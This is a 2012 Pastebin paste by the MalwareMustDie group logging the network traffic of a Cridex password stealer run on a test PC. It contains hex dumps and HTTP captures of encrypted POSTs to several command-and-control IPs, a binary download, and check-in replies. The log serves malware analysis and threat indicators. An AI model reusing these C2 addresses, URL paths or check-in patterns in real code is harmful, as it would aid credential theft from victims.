SHARE
TWEET

#MalwareMustDie - PD079-BHEK-20121209-3

MalwareMustDie Dec 9th, 2012 103 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. ===========================--
  2. #MalwareMustDie - BHEK2 PD079
  3. Cridex - Password stealer
  4. NETWORK ACTIVITY EVIDENCE
  5. @unixfreaxjp /malware]$ date
  6. Sun Dec  9 21:21:01 JST 2012
  7. ===========================
  8.  
  9. HTTP/1.1 POST request was sent to 180.235.150.72:8080 contains encrypted data:
  10.  
  11. // 192.168.7.84 ---> 180.235.150.72 HTTP/POST /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ HTTP/1.1
  12.  
  13. 00000000  50 4f 53 54 20 2f 4e 35  6e 6d 4c 43 41 41 41 2f POST /N5 nmLCAAA/
  14. 00000010  4c 78 63 71 4b 41 41 2f  47 4c 6b 4f 56 43 41 41 LxcqKAA/ GLkOVCAA
  15. 00000020  41 41 2f 20 48 54 54 50  2f 31 2e 31 0d 0a 41 63 AA/ HTTP /1.1..Ac
  16. 00000030  63 65 70 74 3a 20 2a 2f  2a 0d 0a 55 73 65 72 2d cept: */ *..User-
  17. 00000040  41 67 65 6e 74 3a 20 4d  6f 7a 69 6c 6c 61 2f 35 Agent: M ozilla/5
  18. 00000050  2e 30 20 28 57 69 6e 64  6f 77 73 3b 20 55 3b 20 .0 (Wind ows; U;
  19. 00000060  4d 53 49 45 20 37 2e 30  3b 20 57 69 6e 64 6f 77 MSIE 7.0 ; Window
  20. 00000070  73 20 4e 54 20 36 2e 30  3b 20 65 6e 2d 55 53 29 s NT 6.0 ; en-US)
  21. 00000080  0d 0a 48 6f 73 74 3a 20  31 38 30 2e 32 33 35 2e ..Host:  180.235.
  22. 00000090  31 35 30 2e 37 32 3a 38  30 38 30 0d 0a 43 6f 6e 150.72:8 080..Con
  23. 000000A0  74 65 6e 74 2d 4c 65 6e  67 74 68 3a 20 33 34 37 tent-Len gth: 347
  24. 000000B0  0d 0a 43 6f 6e 6e 65 63  74 69 6f 6e 3a 20 4b 65 ..Connec tion: Ke
  25. 000000C0  65 70 2d 41 6c 69 76 65  0d 0a 43 61 63 68 65 2d ep-Alive ..Cache-
  26. 000000D0  43 6f 6e 74 72 6f 6c 3a  20 6e 6f 2d 63 61 63 68 Control:  no-cach
  27. 000000E0  65 0d 0a 0d 0a                                   e....
  28. 000000E5  15 7d 92 25 cf 68 92 5b  ae 96 b0 62 ed 8f 24 fb .}.%.h.[ ...b..$.
  29. 000000F5  5b bb 87 19 f4 34 6c d9  95 67 20 a7 fb 66 f3 6c [....4l. .g ..f.l
  30. 00000105  3f 25 7a f7 41 b1 67 6a  12 c3 99 5d ea 1a cd b7 ?%z.A.gj ...]....
  31. 00000115  cf 67 e6 ca 91 50 f2 2d  ad 89 41 4a d4 65 d7 c7 .g...P.- ..AJ.e..
  32. 00000125  d2 32 d7 16 b0 fd 49 c2  52 e6 56 cc 5a 71 1e 50 .2....I. R.V.Zq.P
  33. 00000135  9f 0a 76 4d 44 9d 0e 25  ec 0a 5b 53 ba d3 20 0c ..vMD..% ..[S.. .
  34. 00000145  08 cb 10 ce 37 dc 2a 12  b5 67 94 1c c7 1e 02 95 ....7.*. .g......
  35. 00000155  c8 c8 37 9d 05 90 8a 28  9e 5d 7a 59 a4 d3 1e a4 ..7....( .]zY....
  36. 00000165  65 0a 06 8a 9a 27 2c 2e  48 85 25 9b e3 24 05 0b e....',. H.%..$..
  37. 00000175  59 36 d2 a2 b2 8e 58 90  ba 2e 64 96 4a 02 85 bc Y6....X. ..d.J...
  38. 00000185  95 58 2c e0 b2 d9 1f 62  df c4 a2 b3 3d 7d 6a 65 .X,....b ....=}je
  39. 00000195  38 f1 ea 27 36 a6 9a 35  9b 66 32 a2 28 c1 01 56 8..'6..5 .f2.(..V
  40. 000001A5  73 c7 7b 23 e7 b2 a7 26  ef c8 8b 64 00 3b 9a a2 s.{#...& ...d.;..
  41. 000001B5  da a3 08 ec 91 60 71 9e  99 60 fc 2d 19 9a 0f 54 .....`q. .`.-...T
  42. 000001C5  32 25 ed 7d a7 33 dc 7e  db e3 97 a2 69 e9 34 ac 2%.}.3.~ ....i.4.
  43. 000001D5  87 47 13 69 71 74 2f b7  cf 07 99 42 14 4f 6c 5b .G.iqt/. ...B.Ol[
  44. 000001E5  b3 6c 19 0a ee a0 7a 77  cb d1 a9 ba a5 18 d9 4c .l....zw .......L
  45. 000001F5  22 ed 4a ce 00 1e 1d ec  90 80 a4 26 4f 6a 8e cc ".J..... ...&Oj..
  46. 00000205  b0 3e 04 2f 9c 73 91 1a  e9 7c 1e 75 17 de c5 f4 .>./.s.. .|.u....
  47. 00000215  c3 b8 3a 59 74 98 ca de  6b 56 bc 4f bb ad 74 d7 ..:Yt... kV.O..t.
  48. 00000225  1f dd 8a e3 5c 25 ac 15  50 02 41 a0 4a d7 c1 c6 ....\%.. P.A.J...
  49. 00000235  52 70 6c 4c 1c 6d 90 12  ac 9d f9                RplL.m.. ...
  50.  
  51. Which answered by sending the binary from 180.235.150.72 to TestPC:
  52.  
  53. // 180.235.150.72 ===> 192.168.7.84 TCP [TCP segment of a reassembled PDU]
  54.  
  55. Server: nginx/1.0.10
  56. Date: Sun, 09 Dec 2012 07:19:02 GMT
  57. Content-Type: text/html; charset=UTF-8
  58. Transfer-Encoding: chunked
  59. Connection: keep-alive
  60. X-Powered-By: PHP/5.3.18-1~dotdeb.0
  61. Vary: Accept-Encoding
  62.  
  63. 00000000  48 54 54 50 2f 31 2e 31  20 32 30 30 20 4f 4b 0d HTTP/1.1  200 OK.
  64. 00000010  0a 53 65 72 76 65 72 3a  20 6e 67 69 6e 78 2f 31 .Server:  nginx/1
  65. 00000020  2e 30 2e 31 30 0d 0a 44  61 74 65 3a 20 53 75 6e .0.10..D ate: Sun
  66. 00000030  2c 20 30 39 20 44 65 63  20 32 30 31 32 20 30 37 , 09 Dec  2012 07
  67. 00000040  3a 31 39 3a 30 32 20 47  4d 54 0d 0a 43 6f 6e 74 :19:02 G MT..Cont
  68. 00000050  65 6e 74 2d 54 79 70 65  3a 20 74 65 78 74 2f 68 ent-Type : text/h
  69. 00000060  74 6d 6c 3b 20 63 68 61  72 73 65 74 3d 55 54 46 tml; cha rset=UTF
  70. 00000070  2d 38 0d 0a 54 72 61 6e  73 66 65 72 2d 45 6e 63 -8..Tran sfer-Enc
  71. 00000080  6f 64 69 6e 67 3a 20 63  68 75 6e 6b 65 64 0d 0a oding: c hunked..
  72. 00000090  43 6f 6e 6e 65 63 74 69  6f 6e 3a 20 6b 65 65 70 Connecti on: keep
  73. 000000A0  2d 61 6c 69 76 65 0d 0a  58 2d 50 6f 77 65 72 65 -alive.. X-Powere
  74. 000000B0  64 2d 42 79 3a 20 50 48  50 2f 35 2e 33 2e 31 38 d-By: PH P/5.3.18
  75. 000000C0  2d 31 7e 64 6f 74 64 65  62 2e 30 0d 0a 56 61 72 -1~dotde b.0..Var
  76. 000000D0  79 3a 20 41 63 63 65 70  74 2d 45 6e 63 6f 64 69 y: Accep t-Encodi
  77. 000000E0  6e 67 0d 0a 0d 0a 66 33  62 0d 0a bb aa ef 6f 93 ng....f3 b.....o.
  78. 000000F0  90 d7 73 f7 37 87 c1 c0  79 61 6f 30 b5 fb 96 65 ..s.7... yao0...e
  79. 00000100  c0 cf 78 a3 b6 7e b1 87  29 30 90 a5 5f 09 fc d5 ..x..~.. )0.._...
  80. 00000110  fd ca a6 f1 88 4d 29 a7  48 dc 28 f7 42 83 c2 1b .....M). H.(.B...
  81. 00000120  99 7b dd ca a6 a3 b0 87  74 5c 72 2f f6 3e c2 28 .{...... t\r/.>.(
  82.     :                :
  83.     :                :
  84. 0006DC14  fb b5 0b 98 5d d8 bd b1  69 8c 26 79 a1 d5 2c b6 ....]... i.&y..,.
  85. 0006DC24  57 55 f0 ee cd 5b 42 4a  13 4e 3e 5f 92 5e 17 4e WU...[BJ .N>_.^.N
  86. 0006DC34  dd b5 64 90 d4 4e a8 b0  36 03 f1 de 58 a9 d3 69 ..d..N.. 6...X..i
  87. 0006DC44  1c ef 59 f2 20 33 18 24  a6 74 42 23 04 14 19 c9 ..Y. 3.$ .tB#....
  88. 0006DC54  92 f4 88 1e e9 68 05 1d  6b e2 b8 e3 3f f4 ea 85 .....h.. k...?...
  89. 0006DC64  84 2f 81 7d c8 6e 96 a5  9a 88 7a c2 72 ee d7 2f ./.}.n.. ..z.r../
  90. 0006DC74  45 6c 0d eb 0a f3 7b c2  21 68 1b d0 01 2e 70 45 El....{. !h....pE
  91. 0006DC84  8e 0d 0a 30 0d 0a 0d 0a                          ...0....
  92.  
  93. There are more than 3(three) times tries to handshake connection with remote IP: 132.248.49.112
  94. 192.168.7.84 ===> 132.248.49.112 TCP    netarx > http-alt [SYN] Seq=0 Win=16384 Len=0 MSS=1460 SACK_PERM=1
  95. 132.248.49.112 => 192.168.7.84   TCP http-alt > netarx [RST, ACK] Seq=1 Ack=1 Win=0 Len=0
  96.  
  97. Also it tries to handshake connection with remote IP: 113.130.65.77
  98. 192.168.7.84 ===> 113.130.65.77 TCP     optima-vnet > http-alt [SYN] Seq=0 Win=16384 Len=0 MSS=1460 SACK_PERM=1
  99. 113.130.65.77 ==> 192.168.7.84  TCP     http-alt > optima-vnet [RST, ACK] Seq=1 Ack=1 Win=0 Len=0
  100.  
  101. Then it communicate in HTTP with 203.113.98.131:80
  102. 192.168.7.84 ===> 203.113.98.131 HTTP   POST /asp/intro.php HTTP/1.0
  103. Request sent:
  104. --------------
  105. POST /asp/intro.php HTTP/1.0
  106. Host: 203.113.98.131
  107. Accept: */*
  108. Accept-Encoding: identity, *;q=0
  109. Content-Length: 251
  110. Connection: close
  111. Content-Type: application/octet-stream
  112. Content-Encoding: binary
  113. User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
  114. CRYPTED0...DK.V..aa..c.....PI%.^D.|2.s;.p..T=....*.........
  115. MX.../......../.;(.dl7).c..).......Jk.rO..e....!].......|.ej
  116. ......6.H.y4J_.......f2...8..P.V.....oy.....$...6.z.8.. .0..
  117. .1..H,.....nCa.Z.....?I...r.q-.........7f[......O....vX0-.&.
  118. -D.D5.......
  119.  
  120. Response received:
  121. -------------------
  122. HTTP/1.1 200 OK
  123. Server: nginx/1.0.10
  124. Date: Sun, 09 Dec 2012 07:21:47 GMT
  125. Content-Type: text/html; charset=windows-1251
  126. Connection: close
  127. X-Powered-By: PHP/5.3.18-1~dotdeb.0
  128. Vary: Accept-Encoding
  129. Content-Length: 16
  130.  
  131. STATUS-IMPORT-OK
  132.  
  133.  
  134. Then it also connect to remote IP: 173.224.221.135:8080 to send the POST data,
  135. with the following recorded communication:
  136.  
  137. 192.168.7.84    173.224.221.135 HTTP POST /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ HTTP/1.1
  138.  
  139. POST /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ HTTP/1.1
  140. Accept: */*
  141. User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)
  142. Host: 173.224.221.135:8080
  143. Content-Length: 408
  144. Connection: Keep-Alive
  145. Cache-Control: no-cache
  146. ..c....S..l.........r.......6.l{IMs6.....S......uOKvE...u..}Q?&UM..j..`...%=W+3.........
  147. .r......e..md.h.%.O...0]fr......M.M.....o..P.cm& ......[.(j.hW....M. Y..Y....)eL.....u..q
  148. @..>.1.y..k.A=.!.....hZ.[...........ln..~..`M..>......|t."S..Y.o-fx.......
  149. 4..Bv...
  150. .+.}}..2C.&....VSmZO...g6..=?P.6......,6'_T.J
  151. .\..!GZ.7..#..........:F.r...e
  152. .........."..tPWJs... ....+.".U....f&#..!."..0.8|s?.LNp.}......D.tI.0.
  153.  
  154. HTTP/1.1 200 OK
  155. Server: nginx/1.0.10
  156. Date: Sun, 09 Dec 2012 07:22:32 GMT
  157. Content-Type: text/html; charset=UTF-8
  158. Connection: keep-alive
  159. X-Powered-By: PHP/5.3.18-1~dotdeb.0
  160. Vary: Accept-Encoding
  161. Content-Length: 165
  162. ..N..&..D[.4.$..H....8..CL|j.(l.93.QP..?.
  163. .N%9M.k.......?...Z....|..=6.U...3o.h...F...5
  164. .=...Q.L.'.....H..p.1..I=.....|..j..!..}.9..^kK
  165. 2U...`......hJ....^.<..
  166. e....
  167.  
  168. POST /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ HTTP/1.1
  169. Accept: */*
  170. User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)
  171. Host: 173.224.221.135:8080
  172. Content-Length: 387
  173. Connection: Keep-Alive
  174. Cache-Control: no-cache
  175. B..L.l.............qe..x..p
  176. e.,-........4.q...1X..|..........O...rP.5cO<.B./...q.......%...T..........
  177. ^.H...J.n.N.l0.s ..d..w}E.....]....B'..Qt..k..Qu.....J"z........Y...:.....u.....jL.
  178. ....#|......=...$..*.*..z......x......zd..y@+4..+./
  179. ..*...|N..aZY.@)...}...r6..^y.N0{..7.<c.=) ._..V..5:...g........f........~=...R..pZ....v=d..!.......p.......
  180. $=...q..:#....c.N..]...w..kA....R.P}U[5.
  181.  
  182. HTTP/1.1 200 OK
  183. Server: nginx/1.0.10
  184. Date: Sun, 09 Dec 2012 07:22:33 GMT
  185. Content-Type: text/html; charset=UTF-8
  186. Connection: keep-alive
  187. X-Powered-By: PHP/5.3.18-1~dotdeb.0
  188. Vary: Accept-Encoding
  189. Content-Length: 165
  190. ..N..&..D[.4.$..H....8..CL|j.(l.93.QP..?.
  191. .N%9M.k.......?...Z....|..=6.U...3o.h...F...5
  192. .=...Q.L.'.....H..p.1..I=.....|..j..!..}.9..^kK
  193. 2U...`......Qh......>&.......
  194.  
  195.  
  196. It sends the POST data to 206.176.226.157:8080 as follows.....
  197. 192.168.7.84 ===>206.176.226.157        HTTP    POST /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ HTTP/1.1
  198. POST /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ HTTP/1.1
  199. Accept: */*
  200. User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)
  201. Host: 206.176.226.157:8080
  202. Content-Length: 387
  203. Connection: Keep-Alive
  204. Cache-Control: no-cache
  205. o...C.G..rj.....X.......M.2.X;..c2.f...~.....9.6..x..=d..K.p...8.b.J.H.. ?.S..F.:8.g....3l..J..f....Ww....ng...~
  206. ..7FS..~P...vlB....]....B'..Qt..k....\..e6..........]...M...O..$.\U..<
  207. ....:P...GO.W.Uv.A(.l.............*.s.$....*O......su..G....d.;m.J]A.........!...+...
  208. (mF.I....-
  209. ..$. .;....WS..rj.nH:.\.V.5.Z...
  210. ..z..........V.......8.....6.+h...Ju.4;....)#h..D.$=.).....3.:\q.r^.5...LHTTP/1.1 200 OK
  211.  
  212. Server: nginx/1.0.10
  213. Date: Sun, 09 Dec 2012 07:23:09 GMT
  214. Content-Type: text/html; charset=UTF-8
  215. Connection: keep-alive
  216. X-Powered-By: PHP/5.3.18-1~dotdeb.0
  217. Vary: Accept-Encoding
  218. Content-Length: 165
  219. ..N..&..D[.4.$..H....8..CL|j.(l.93.QP..?.
  220. .N%9M.k.......?...Z....|..=6.U...3o.h...F...5
  221. .=...Q.L.'.....H..p.1..I=.....|..j..!..}.9..^kK
  222. 2U...`........X..a%..........
  223. ----
  224. #MalwareMustDie!!!!
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!
 
Top